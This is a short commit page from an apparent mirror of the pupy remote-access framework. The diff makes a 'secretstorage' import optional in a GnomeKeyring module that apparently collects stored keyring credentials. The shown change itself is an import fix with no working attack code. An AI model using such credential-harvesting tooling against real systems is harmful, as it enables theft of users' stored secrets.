mirror of https://github.com/n1nj4sec/pupy.git
Actually without dbus this module can't even be loaded
This commit is contained in:
parent
47e1fb147e
commit
d71a79b024
|
@ -33,7 +33,10 @@ from Crypto.Cipher import AES
|
||||||
from Crypto import Random
|
from Crypto import Random
|
||||||
from StringIO import StringIO
|
from StringIO import StringIO
|
||||||
|
|
||||||
import secretstorage
|
try:
|
||||||
|
import secretstorage
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
class GnomeKeyring(object):
|
class GnomeKeyring(object):
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
|
|
Loading…
Reference in New Issue